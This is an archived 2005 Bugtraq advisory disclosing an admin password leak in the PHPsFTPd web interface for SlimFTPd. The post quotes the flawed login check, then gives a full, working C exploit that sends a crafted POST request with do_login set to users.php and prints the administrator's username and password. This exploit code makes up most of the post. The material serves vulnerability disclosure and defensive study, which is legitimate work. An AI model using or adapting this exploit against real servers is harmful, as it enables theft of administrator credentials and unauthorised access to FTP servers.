lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <op.stuq8kyzwosoee@www.xion.at>
Date: Wed, 13 Jul 2005 14:49:22 +0200
From: Steve <steve01@...llo.at>
To: bugtraq@...urityfocus.com
Cc: list@...uriteam.com
Subject: PHPsFTPd - Admin password leak


Author:  	Stefan Lochbihler
Date:    	11. Juli 2005
Affected 	Software: PHPsFTPd
Software 	Version: 0.2 -> 0.4
Software 	URL: http://phpsftpd.sourceforge.net/
Attack:  	Admin password leak


about PHPsFTPd:
PHPsFTPd is a web based administration and configuration interface
for the SLimFTPd ftp serverIt can be used an any http server that
suports PHP and does not need a database or adittional php modules,
only SlimFTPD It allows the administrators of the ftp server to
configurate it from within this interface as opposed to its native
ascii conf.file It shows statistics about the users that accesed
the server , the files that were downloaded , server breakdowns etc


Hi there again

during a look at the code of the PHPsFTPd Project i find out that it
is possible to get the Admins Username & Password. This happens
when we send a specially crafted POST Request to the user.php script.
The reason of the leakness is at the inc.login.php script.
When you take a look at the code below you see that the code will exit
if there is no logged session or we dont try to logout.
But when we POST the do_login var with some stuff in it execution goes on.


snipped from inc.login.php


//login form
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&
!isset($_POST['do_login'])) {
		echo "<p>&nbsp;</p>
		<form action='index.php' method='post'>
		<img src=gfx/ico_notice.gif align=absmiddle> Please login with admin
pass<br>
		<input class=td type='password' name='pass'>
		<input class=button type='submit' name='login' value='Login'>
		</form>
		";
		die;
}





exploit:
Print the admins username & password



// PHPsFTPd Admin Password Leak
// tested on a WinXP SP1 box



#include "stdafx.h"
#include "stdio.h"
#include "winsock2.h"

#pragma comment (lib,"ws2_32")

#define PORT 80
#define rootdir "/phpsftpd/"


typedef unsigned long ulong;


void usage(char *);
ulong checkhost(char *);



ulong checkhost(char *host)
{
struct hostent *hp;
ulong host_ip=0;

host_ip=inet_addr(host);
if(host_ip==INADDR_NONE){
     hp=gethostbyname(host);
if(!hp){
      printf("unable to resolv host...\n");
	exit(1);
	}

    host_ip= *(ulong*)hp->h_addr;

}

return host_ip;

}


void usage (char *progn){

printf("Usage[%s]: www.targethost.com\n",progn);
exit(0);

}




int main(int argc, char* argv[])
{

    WSADATA wsa;
    SOCKET client;
    WORD wsVersion;

    char httpRequest[1024];
    char recvBuffer[1024];

    char *p;

    struct sockaddr_in addr;
    int err=0,recvSize=0;

    printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@...llo.at\n");

      if(argc<2)
       usage(argv[0]);
	

wsVersion=MAKEWORD(2,0);

    if(err=WSAStartup(wsVersion,&wsa)){
     printf("Error: WSAStartup\n");
     exit(0);
}


     client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     if(client==INVALID_SOCKET){
     printf("Error: Create Socket\n");
     exit(0);
}


addr.sin_addr.s_addr = checkhost(argv[1]);
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;


memset(httpRequest,'\0',sizeof(httpRequest));

strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"users.php?action=edit&username=root
HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Host:
www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type:
application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Length:
13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0);
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';


//shit when anyone use a 0x20 on his password
p=strstr(recvBuffer,"value=");
printf("Username:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);

p=strstr(p,"value=");

printf("\n");
printf("Password:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);
     	
	
closesocket(client);
WSACleanup();

printf("\n");
return 0;
}


Vendor Status: The Vendor is informed !

Discovered (c) by Steve





-- 
Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ